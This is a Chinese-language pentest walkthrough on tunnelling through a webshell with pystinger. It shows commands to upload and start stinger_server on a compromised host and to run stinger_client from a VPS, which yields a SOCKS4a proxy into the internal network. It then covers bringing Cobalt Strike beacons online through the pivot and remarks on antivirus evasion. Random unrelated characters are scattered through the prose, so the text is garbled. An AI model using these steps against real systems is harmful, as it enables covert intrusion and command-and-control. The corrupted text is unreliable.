0x00 背景
pystinger 可通過 webshell 實(shí)現(xiàn)ss4代理麻蹋、端口映射厚柳。
gayhub地址:https://github.com/FunnyWolf/pystinger
由于穩(wěn)定性囱稽、速度一般,不建議優(yōu)先使用玻靡,在常規(guī)正向代理沒法用的時(shí)候或者想在不出網(wǎng)的機(jī)器上C2煞肾,可以嘗試。
這次實(shí)驗(yàn)的目標(biāo)/跳板機(jī)器:
0x01 正向 Socks4a 代理
pystinger 原理圖
服務(wù)端配置
將 webshell
上傳到目標(biāo)web目錄下道宅,能成功訪問則返回 UTF-8
同時(shí)上傳服務(wù)器文件食听,并啟動(dòng)
./stinger_server 0.0.0.0 #linux
start stinger_server.exe 0.0.0.0 #windows
客戶端配置
利用 VPS
執(zhí)行如下命令
./stinger_client -w http://xxx.com/proxy.php -l 0.0.0.0 -p 6000
此時(shí)已經(jīng)在 VPS
的 6000 端口啟動(dòng)了一個(gè)ss4a代理,同時(shí)將目標(biāo)機(jī)器 60020 端口映射到 VPS
上
這是我們攻擊機(jī)通過 vps
代理即可進(jìn)入目標(biāo)內(nèi)網(wǎng)
0x02 C2 上線
單主機(jī)上線
我們在cs上配置一個(gè) LISTENER
吐了污茵,搞了一下午樱报,用 windows
起的客戶端始終建立不了連接,改換 linux
就行了
橫向上線
當(dāng)然泞当,在橫向階段迹蛤,我們內(nèi)網(wǎng)其他機(jī)器也可以通過代理的跳板機(jī)來上線,beacons 填寫為192.168.3.11(目標(biāo)/跳板機(jī)的內(nèi)網(wǎng)IP地址)
可以看到,192.168.247.3 這臺機(jī)器走了我們跳板機(jī)的 60020 端口進(jìn)行上線
0x03 總結(jié)
經(jīng)過測試該工具免殺效果還可以盗飒,但是穩(wěn)定性一般穷缤,使用過程中cs會(huì)話可能假死掉,需要把stinger_server.exe進(jìn)程結(jié)束掉箩兽,然后重新啟動(dòng)津肛。